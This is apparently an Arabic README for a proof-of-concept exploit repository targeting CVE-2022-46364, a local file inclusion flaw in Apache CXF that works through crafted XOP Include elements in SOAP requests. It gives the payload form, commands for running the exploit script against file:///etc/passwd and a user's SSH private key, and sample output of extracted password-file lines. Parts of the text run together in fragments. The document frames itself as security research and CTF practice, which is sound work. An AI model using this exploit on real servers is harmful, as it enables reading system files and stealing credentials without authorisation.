
إثبات مفهوم لاستغلال CVE-2022-46364، وهي ثغرة تضمين ملفات محلية في Apache CXF عبر عناصر XOP Include مُصمّمة بعناية في طلبات SOAP، مما يسمح بقراءة ملفات عشوائية.
يحتوي هذا المستودع على استغلال لإثبات المفهوم (PoC) لـ CVE-2022-46364، وهي ثغرة تضمين ملفات محلية (LFI) في Apache CXF.
تنشأ الثغرة بسبب معالجة غير صحيحة لعناصر تضمين XOP (XML-binary Optimized Packaging) في طلبات SOAP، مما يسمح للمهاجمين بقراءة ملفات عشوائية من الخادم.
يقوم Apache CXF بمعالجة غير صحيحة لعناصر <xop:Include> داخل طلبات SOAP.
من خلال توفير href مُعدّل (مثل file:///etc/passwd)، قد يقوم الخادم بتضمين وإرجاع محتويات الملفات المحلية.
تحقق دائمًا من الإصدار المتأثر بالضبط في بيئتك المستهدفة.
<xop:Include href="file:///path/to/file">.
├── cxf_lfi.sh # Exploit script
├── README.md # Documentation
├── LICENSE # MIT License
└── .gitignore
chmod +x cxf_lfi.sh
قم بتحديث الهدف داخل البرنامج النصي:
TARGET="http://<TARGET_IP>:8080/employeeservice"
./cxf_lfi.sh file:///etc/passwd
./cxf_lfi.sh file:///etc/passwd
./cxf_lfi.sh file:///home/user/.ssh/id_rsa
[+] Target: http://10.10.10.10:8080/employeeservice
[+] File: file:///etc/passwd
[+] Extracted Content:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
قد تقوم بعض الخوادم بما يلي:
file://يعتمد تحليل المخرجات على تنسيق الاستجابة وقد يتطلب فحصًا يدويًا.
<xop:Include>file:// URIsهذا المشروع مخصص لـ:
لا تستخدم هذه الأداة على أنظمة دون إذن صريح.
تم تطويره كجزء من البحث الأمني وممارسة CTF.